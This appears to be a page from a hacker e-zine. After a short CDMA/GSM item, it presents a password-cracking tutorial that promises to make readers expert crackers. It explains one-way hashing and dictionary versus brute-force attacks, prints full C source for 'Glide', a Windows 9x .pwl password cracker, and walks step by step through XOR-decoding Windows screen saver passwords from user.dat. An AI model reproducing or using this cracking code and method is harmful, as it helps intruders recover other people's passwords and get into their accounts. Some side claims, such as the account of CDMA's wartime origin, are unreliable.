
Technology Update

 

What are the differences between CDMA (Code Division Multiple Access) and GSM (Global System for Mobile Communication)?

The only difference is the way in which voice gets carried from one phone to the other. CDMA assembles multiple voices into the same frequency and also increases voice clarity. The technology also helps you receive calls when the signal is weak, so it doesn't have problems like Call Failed or fading during high traffic density.

This also gives CDMA service providers the flexibility to provide data and video service.

CDMA was invented during World War 2, when Allied forces wanted to get past the Germans by sending coded messages over different frequencies and giving them the ability to be accessed from different points, hence "Code Division Multiple Access."

Presently CDMA mobiles are available with Reliance, TATA Indicom, Hyundia Infocom.

 

 

Mail Me at

desert_ghost85 @yahoo.com

 

Password Cracking Decrypted 1  



 
Almost all of you must have come across the term 'password'. Ever wondered why exactly passwords work and how to crack them? Well, this manual will answer all your queries about passwords and make you an expert in cracking passwords.

 


Passwords: An Introduction


First of all, what exactly is a password? A password is best described as a verification or authentication tool. Passwords are used to ensure that only those people who have the authority or the permission to view the data can access it. A password is required in many places: you need one to access your Inbox, you need one to dial up to your Internet Service Provider, and in some organizations you also need to enter one to start the system. In all these places the Username and Password pair is used to authenticate the user. The username identifies the user and the password authenticates the user, and for every unique username there is a unique password. Take the example of the lock and key: for every lock you need a unique key to open it and enter. Here the lock acts as the username and the key would be the password. So passwords are as important as the key to your house.


Your house remains safe as long as only you, the rightful owner, have the key and no one else finds it. Similarly, the concept behind passwords is that only the rightful owner knows the password and no one else does. Every day we hear about password stealing, computer break-ins, etc. Sometimes the user chooses very lame passwords which are easily guessed by hackers. Here are certain guidelines which you must keep in mind while choosing a password:
1. Never keep your password the same as your Username.
2. Never choose your own name, date of birth, spouse's name, pet's name, child's name, etc. as your password; those are the first ones tried by a hacker.
3. Never leave your password as just 'Enter' (carriage return), as some lazy people do.
4. Try to choose a word which is not in the dictionary and contains both numbers and letters, and if possible use both lower case and upper case letters and also symbols like #, $, %, ^ etc., as such passwords can be cracked only by brute force password crackers, which take too long to crack them.


You may say that the choice of weak passwords is responsible for the large number of hacks, but people themselves are the weakest link in the whole authentication process. Most people use lame passwords like those I mentioned above, and those who use excellent passwords are not able to remember them, so they write the password down on a piece of paper and stick it on their monitor. One should try one's level best to remember weird passwords in order to keep the system secure. The places where written-down passwords are most often found are beneath the keyboard, behind the CPU or even on the sides of the monitor. Some people have trouble remembering the large number of passwords they are asked for while using various services; as a result they use the same password everywhere. Thus knowing even a single password might help in some cases.


Password Cracking

The most common method of password cracking is password guessing; although it requires a lot of luck, it can sometimes be successful. To start guessing the password, you first need to gather all kinds of info about the victim. (See the guidelines for choosing a password above for more details.)


The most common and the most successful method of password cracking is the use of password crackers. Now what exactly are password crackers? To understand what a password cracker is and how it works, you first need to understand how a person is authenticated.

Whenever you create a new account (by registering, running a setup program and so on), you are asked for a Username and Password. The username is mostly stored in plaintext, but the password that you enter is stored in an encrypted form. When you enter the password, it is passed through a predefined algorithm, is thus encrypted, and is stored on the hard disk. The next time you use the account and enter the password, the text (password) you type is passed through the same algorithm and is compared with the earlier stored value. If the two match, the user is authenticated; otherwise the authentication fails.


The algorithm that is used to encrypt the password is a one-way algorithm. By that I mean that if we try to pass the encrypted password through a reverse algorithm, we will not get the original plaintext password.

Let's take an example to make it clearer: say your plaintext password is xyz123 and it is passed through an algorithm and stored in the file as 0101027AF. Now even if someone gets this encrypted password and knows the algorithm which xyz123 is passed through to get 0101027AF, they cannot reverse the algorithm to get xyz123 from 0101027AF.

When you are typing in your password, the computer does not display it in plaintext but instead shows only stars, i.e. ********, so that someone who is shoulder surfing cannot find out the password. The text box has been programmed that way. On most forms of Unix you will not even see the asterisks and the cursor will not move, so that a person shoulder surfing finds out neither the password nor its length.


Password crackers are of two different types: Brute Force and Dictionary Based.

Dictionary Based password crackers try out all the passwords from a given predefined dictionary list to crack a password. These are faster, but more often than not they are unsuccessful and do not return the password. As they do not try out all combinations of possible keys, they are unable to crack passwords which have symbols or numbers in between.

Brute Force password crackers try out all combinations of all the keys which can be found on the keyboard (i.e. symbols, numbers and letters, both lower case and upper case). These kinds of password crackers have a greater success rate but take a long time to crack the password. As they take all possible keys into consideration, they are more effective.

Now that you know the two main types of password crackers, let's see how they work.

As passwords are encrypted by a one-way algorithm, password crackers do not extract the password from the file. Instead they take a combination of letters, encrypt it by passing the characters through the original algorithm, and compare this value with the stored encrypted value. If the two match, the password cracker displays the password in plaintext.
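
The store-then-compare login flow described above, together with the password guidelines listed earlier, as an added Python example that is not part of the original page. It assumes PBKDF2-HMAC-SHA256 with a random salt as the one-way algorithm (the page does not name one, and this is not what Windows 9x uses); the word list, personal details and function names are constructed for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed work factor; every guess has to pay this cost too

# Constructed sample data (not from the page): a tiny dictionary and one user's details.
DICTIONARY = {"password", "dragon", "monkey", "sunshine"}
PERSONAL = {"alice", "rex", "14021985"}


def guideline_problems(username, password, personal=PERSONAL, dictionary=DICTIONARY):
    """Return which of the page's guidelines (1-4) a candidate password breaks."""
    problems = []
    lowered = password.lower()
    if lowered == username.lower():
        problems.append("same as username")               # guideline 1
    if lowered in personal:
        problems.append("name, birthday or similar")      # guideline 2
    if password == "":
        problems.append("empty (just Enter)")             # guideline 3
    if lowered in dictionary:
        problems.append("dictionary word")                # guideline 4
    has_digit = any(c.isdigit() for c in password)
    has_alpha = any(c.isalpha() for c in password)
    if not (has_digit and has_alpha):
        problems.append("needs both letters and digits")  # guideline 4
    return problems


def store(password):
    """What goes on disk: a random salt and the one-way output, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify(record, attempt):
    """Login: pass the attempt through the same algorithm and compare the results."""
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", attempt.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


def register(username, password):
    """Refuse weak choices up front, otherwise return the record to store."""
    problems = guideline_problems(username, password)
    if problems:
        raise ValueError("; ".join(problems))
    return store(password)


if __name__ == "__main__":
    record = register("alice", "xyz123")  # the page's sample password
    print(verify(record, "xyz123"), verify(record, "xyz124"))
    print(guideline_problems("alice", "Alice"))
    # Same password, different salts: the stored values do not match each other.
    print(store("xyz123")[1] != store("xyz123")[1])
```

Because each record has its own salt, a guess has to be re-hashed per account, and the iteration count sets the price of every guess.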

Cracking The Windows Login Password

The Windows (9x) login password is passed through a very weak algorithm and is quite easy to crack. Windows stores this login password in *.pwl files in the c:\windows directory. Each .pwl file is named after the username whose password it stores. A typical .pwl file looks like this:

Note: This .pwl file has been taken from a Win98 machine running IE 5.0

 


###############CUT HERE##############
у‚...-џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ

џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ

џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ

џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџR
p u.аX+|rаq"Б/2Г ЪхЁhCJ‚D з `ЭYЅ!эx}(qWЄуЦБ<!?рм6šс˜єц4+\3/4ѕ+%EАЫд§mЧд оIЛ‚ B рзœја...'@############CUT HERE#############

 


Let's go through the contents of this .pwl file. I am not sure what the first line signifies, but my guess would be that it is the name to which the computer is registered. The next four lines have just been entered by Windows and are not readable. The last two lines are the password, but in encrypted form. There is no way to get the plaintext password by just studying the Windows algorithm and these lines. To actually crack the password you need a simple but kewl cracker coded in C called Glide. I have included the code below. If you have a sound knowledge of C you can study the code and actually experience how a password cracker works and how a password is encrypted in Windows, i.e. learn more about the Windows encryption algorithm.

*********************
Newbie Tip: All exploits, crackers and mail bombers, practically everything related to hacking, have been written in either Perl or C. If you really want to be considered an elite hacker, you have to know how to program; without a sound knowledge of either C (C++) or Perl you cannot hack successfully. Almost all exploits available on the net have an important part edited or missing, without which they are of no use. Some exploits may need to be edited in order to run on your platform. In order to do all this, programming is needed.
*********************

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

#define MAX_PWL 100000

/* Data is zero padded a little past MAX_PWL so short look-aheads stay in bounds */
static unsigned char Data[MAX_PWL + 8];  /* raw contents of the PWL file */
static unsigned char keystream[1001];    /* keystream recovered so far */
static int Rpoint[300];                  /* resource pointer table */

int main(int argc, char *argv[]) {
    FILE *fd;
    int i, j, c;
    int size;
    int ch;
    char *name;
    int cracked;
    int sizemask;
    int maxr;
    int rsz;
    int pos;
    int Rall[300]; /* resource allocation table */

    if (argc < 2) {
        printf("usage: glide filename (username)\n");
        exit(1);
    }
    /* read PWL file (stop at MAX_PWL bytes instead of overrunning Data) */
    fd = fopen(argv[1], "rb");
    if (fd == NULL) {
        printf("can't open file %s\n", argv[1]);
        exit(1);
    }
    size = 0;
    while (size < MAX_PWL && (c = fgetc(fd)) != EOF) {
        Data[size++] = (unsigned char)c;
    }
    fclose(fd);
    /* find username */
    name = argv[1];
    if (argc > 2) name = argv[2];
    printf("Username: %s\n", name);
    /* copy encrypted text into keystream */
    cracked = size - 0x0208;
    if (cracked < 0) cracked = 0;
    if (cracked > 1000) cracked = 1000;
    memcpy(keystream, Data + 0x208, cracked);
    /* generate 20 bytes of keystream */
    for (i = 0; i < 20; i++) {
        ch = toupper((unsigned char)name[i]);
        if (ch == 0) break;
        if (ch == '.') break;
        keystream[i] ^= (unsigned char)ch;
    }
    cracked = 20;

    /* find allocated resources */
    sizemask = keystream[0] + (keystream[1] << 8);
    printf("Sizemask: %04X\n", sizemask);
    for (i = 0; i < 256; i++) Rall[i] = 0;
    maxr = 0;
    for (i = 0x108; i < 0x208; i++) {
        if (Data[i] != 0xff) {
            Rall[Data[i]]++;
            if (Data[i] > maxr) maxr = Data[i];
        }
    }
    /* resource pointer table size appears to be divisible by 16 */
    maxr = (((maxr / 16) + 1) * 16);
    /* search after resources */
    Rpoint[0] = 0x0208 + 2 * maxr + 20 + 2; /* first resource */
    for (i = 0; i < maxr; i++) {
        /* find size of current resource */
        pos = Rpoint[i];
        if (pos < 0 || pos + 3 >= (int)sizeof(Data)) {
            printf("resource pointer outside the file buffer\n");
            exit(1);
        }
        rsz = Data[pos] + (Data[pos + 1] << 8);
        rsz ^= sizemask;
        printf("Analyzing block with size: %04x\t(%d:%d)\n", rsz, i, Rall[i]);
        if ((Rall[i] == 0) && (rsz != 0)) {
            printf("unused resource has nonzero size !!!\n");
            printf("If last line produced any : You may try to recover\n");
            printf("press y to attempt recovery\n");
            ch = getchar();
            if (ch != 'y') exit(0);
            while ((c = getchar()) != '\n' && c != EOF) {
                /* discard the rest of the input line */
            }
            rsz = 2;
            i -= 1;
        }
        pos += rsz;
        /* Resources have a tendency to have the wrong size for some reason */
        /* check for correct size */
        if (i < maxr - 1) {
            while (pos + 3 < (int)sizeof(Data) && Data[pos + 3] != keystream[1]) {
                printf(":");
                pos += 2; /* very rude may fail */
            }
        }
        pos += 2; /* include pointer in size */
        Rpoint[i + 1] = pos;
    }
    Rpoint[maxr] = size;
    /* insert Table data into keystream */
    for (i = 0; i <= maxr; i++) {
        keystream[20 + 2 * i] ^= Rpoint[i] & 0x00ff;
        keystream[21 + 2 * i] ^= (Rpoint[i] >> 8) & 0x00ff;
    }
    cracked += maxr * 2 + 2;
    printf("%d bytes of keystream recovered\n", cracked);
    /* decrypt resources */
    for (i = 0; i < maxr; i++) {
        rsz = Rpoint[i + 1] - Rpoint[i];
        if (rsz > cracked) rsz = cracked;
        printf("Resource[%d] (%d)\n", i, rsz);
        for (j = 0; j < rsz; j++) printf("%c", Data[Rpoint[i] + j] ^ keystream[j]);
        printf("\n");
    }

    return 0;
}

 

Windows Screen Saver Password


This is an interesting hack and not many people know about it. It requires no canned hacking tool; we will crack the password manually! First of all, why do we need to crack the Windows Screen Saver? How does it restrict us? If a screen saver is password protected, then whenever it is turned on you need to enter a password in order to turn it off. It does not allow us to do anything on the system unless we enter the password. We will keep seeing the screen saver until we authenticate ourselves by entering the password. Not even CTRL+ALT+DEL works in this case. An average user encounters around 20 different places where he needs to type in a password. Most people find it very difficult to remember more than a single password, hence to make life easier for themselves they use the same password in all the places. Also, on some systems the Login password is the same as the Screen Saver Password. Hence it is very useful to crack the Screen Saver Password.

Now let's move on to cracking the Screen Saver Password. For this example, protect your screen saver with the password 'DOPE'. Windows stores the Screen Saver password in the user.dat file in the Windows directory. If you have multiple profiles on your system, then it is stored in the user.dat file in the c:\windows\profiles\username directory. (On Win 3x systems it is stored in the control.ini file.) The user.dat file constitutes the registry of the Windows system, thus we can say that the Windows Screen Saver Password is stored in the registry. First of all, you need to change the attributes of this file and make it editable by right clicking on it and unselecting the Read Only option, else you will not be able to edit it.

Once this is done, open this file in WordPad (any text editor will do except MS Word and Notepad). Now look for the string: ScreenSave_Data


You will find an even number of characters after Data; this is the Screen Saver Password, encrypted and stored in the hex system. Each pair of hex values represents a single ASCII plaintext character. This means that if there are 10 hex values then the password is 5 characters long, each pair of hex values standing for a single plaintext ASCII character. So in order to get the plaintext password you just need to decrypt these hex values into ASCII.

There are many Screen Saver Password decrypters around which decode the password for you, but I believe that it would be better if we could do it manually without using a third party canned hacking tool. And hey, it is really simple once you get the hang of it. The only thing you need to know is the various number systems. This means that you need to know the Hex system, the Decimal system and also the Binary system.

For example, ASCII character 'A' is 41h(ex), 65 dec(imal) and 01000001 binary.

One could also get hold of a good ASCII chart which has all the number systems and their conversions. Make sure that the ASCII chart you get has Hex, Decimal, Binary and of course plaintext ASCII.

XOR

Before I go on, let me introduce you to XOR. The following is the chart you need to refer to when you need to evaluate the XOR value.


+---------------+---------------+--------+
| Input value A | Input value B | Output |
+---------------+---------------+--------+
|       0       |       0       |   0    |
|       0       |       1       |   1    |
|       1       |       0       |   1    |
|       1       |       1       |   0    |
+---------------+---------------+--------+

Example

Question:              Answer:
00001100               00001100
00101001               00101001
-------- <--XOR        -------- <--XOR
????????               00100101


You may ask how did that happen? Well it's easy. Take the case of the first digits. The Input Value A is 0 and the Input Value B is also 0. Now refer to the XOR chart. You find that the Output when both the Input values are 0 is also 0. Similarly consider the third values. Input Value A is 0 and the Input value B is 1. If we refer to the XOR chart, we find that the Output is 1. However the conventional method is to start from the right, as we are taught in school.
**********************
Hacking Truth: The Screen Saver Password cannot be longer than 14 characters, because if it is longer the system will either not prompt for the password or will hang and reboot.
**********************


It's an even-length string containing letters and numbers. This is your password. If you've read everything, you should have changed your password to 'DOPE', which is 4 characters long, and your encrypted password is 8 characters long (0CA12658). Hmmm, so D O P E is the same as 0C A1 26 58.
So
D = 0C
O = A1
P = 26
E = 58


Am I right? OK, now listen carefully: the 0 represents 4 and the C represents 4 too after decryption. Put those two numbers together and you get 44(h). This is what you have to do with every decrypted pair.
OK, grab an ASCII table and look at 44 hex. That's 'D', like in DOPE. Know what I mean?
So now I'll show you how to get the encryption scheme:
0C --> 44h --> ASCII char 'D'


That means
0 --> 4
C --> 4
OK, now the binary:
0 = 00000000
    ????????
    -------- <--XOR
4 = 00000100


Can you still follow me? It might sound a bit weird, but trust me, it is quite simple. Read it again to make it clear.
0 = 00000000
    00000100
    -------- <--XOR
4 = 00000100


OK, now you know that for the first part 00000100 is used to decrypt the password, right? But the second part goes differently. The second part of the hex number, C, must become 4 too, so that's easy:
C = 00001100
    ????????
    -------- <--XOR
4 = 00000100

After performing XOR you will get
C = 00001100
    00001000 <-- we found our encryption scheme for the second char of the first encrypted character
    -------- <--XOR
4 = 00000100


OK, so far so good: we now know how 0C gets decrypted to 'D' and that the second part uses 00001000.
So we must check if it really works. Change your password to 'ERIKA' and the string in user.dat will be 0DBC3F5626. 0D = E, so check it out:
0 = 00000000
    00000100 <-- Found decryption scheme
    -------- <-- XOR
    00000100 <-- 4!
D = 00001101
    00001000 <-- Found decryption scheme
    -------- <-- XOR
    00000101 <-- 5!


So combine the 2 answers and you'll get 45! 45 hex is ASCII 'E'!! Just like in 'ERIKA'! So we now know how to decrypt the first letter/number of a password! But before going on, I'll briefly repeat all of this.
The first password was DOPE, with the first character 'D', and the 'D' was encrypted as '0C'. We knew that those two characters represented the hex code of ASCII 'D', 44! So that means that 0C has to become 44. We did that with XOR: to make 0 a 4 you had to use 00000100, and to make C a 4 you needed to use 00001000. That means that if you don't know the decrypted password, but you found '0D' as the first two characters of the password, you need to use the same two binary numbers, 00000100 and 00001000. So you did that, and 0 came out as 4, which is logical, and D came out as 5, using 00001000.

Encrypted password:
09 AC 35 59 22 2F E6 53 33 C6 0C B4 19 DB

Decrypting...
+-----------+
[09] AC 35 59 22 2F E6 53 33 C6 0C B4 19 DB
0=
00000000
00000100 <--- We found that one earlier
--------XOR
00000100 = 4
9=
00001001
00001000 <--- This one too
--------XOR
00000001 = 1
09 = 41 = A
Password until now: A
~
09 [AC] 35 59 22 2F E6 53 33 C6 0C B4 19 DB
A=
00001010
00001110 <--- You didn't know this one yet, did you? hehehe
--------XOR
00000100 = 4
C=
00001100
00001110
--------XOR
00000010 = 2
AC = 42 = B
Password until now: AB
~
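
The nibble-by-nibble XOR worked above amounts to XORing each stored byte with a fixed key byte for that position, which is why one known password exposes the scheme for every other. As an added example (not code from the original page), the Python below derives those key bytes from the two password/string pairs quoted on the page and applies them to the 14-byte sample; only the five positions covered by 'ERIKA' can be derived from the page's data, so the remaining positions are shown as '?'. Function names are chosen here for illustration.

```python
# Password / stored-string pairs quoted on the page.
KNOWN_PAIRS = [("DOPE", "0CA12658"), ("ERIKA", "0DBC3F5626")]
# The 14-byte string from the page's walk-through.
SAMPLE = "09 AC 35 59 22 2F E6 53 33 C6 0C B4 19 DB"


def recover_keystream(pairs):
    """XOR each known plaintext byte with its stored byte.

    With a fixed keystream, position i must give the same key byte for every
    password, so the pairs are also cross-checked against each other.
    """
    key = {}
    for plain, stored_hex in pairs:
        stored = bytes.fromhex(stored_hex)
        if len(stored) != len(plain):
            raise ValueError("stored string must have two hex digits per character")
        for i, (p, c) in enumerate(zip(plain.encode("ascii"), stored)):
            k = p ^ c
            if key.setdefault(i, k) != k:
                raise ValueError(f"pairs disagree at position {i}: keystream is not fixed")
    return bytes(key[i] for i in range(len(key)))


def nibble_masks(keystream):
    """Split each key byte into the two 4-bit masks used in the manual method."""
    return [(k >> 4, k & 0x0F) for k in keystream]


def decode(stored_hex, keystream):
    """Decode as many positions as the keystream covers; mark the rest with '?'."""
    stored = bytes.fromhex(stored_hex)  # fromhex() skips the spaces
    known = bytes(c ^ k for c, k in zip(stored, keystream))
    return known.decode("ascii", errors="replace") + "?" * (len(stored) - len(known))


if __name__ == "__main__":
    ks = recover_keystream(KNOWN_PAIRS)
    print("key bytes :", ks.hex(" ").upper())
    for hi, lo in nibble_masks(ks)[:2]:
        print(f"masks     : {hi:08b} {lo:08b}")
    print("decoded   :", decode(SAMPLE, ks))
```

The two pairs agree on every shared position, which confirms that the stored value depends only on the character and its position, not on anything secret to the user.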
 
contd... 
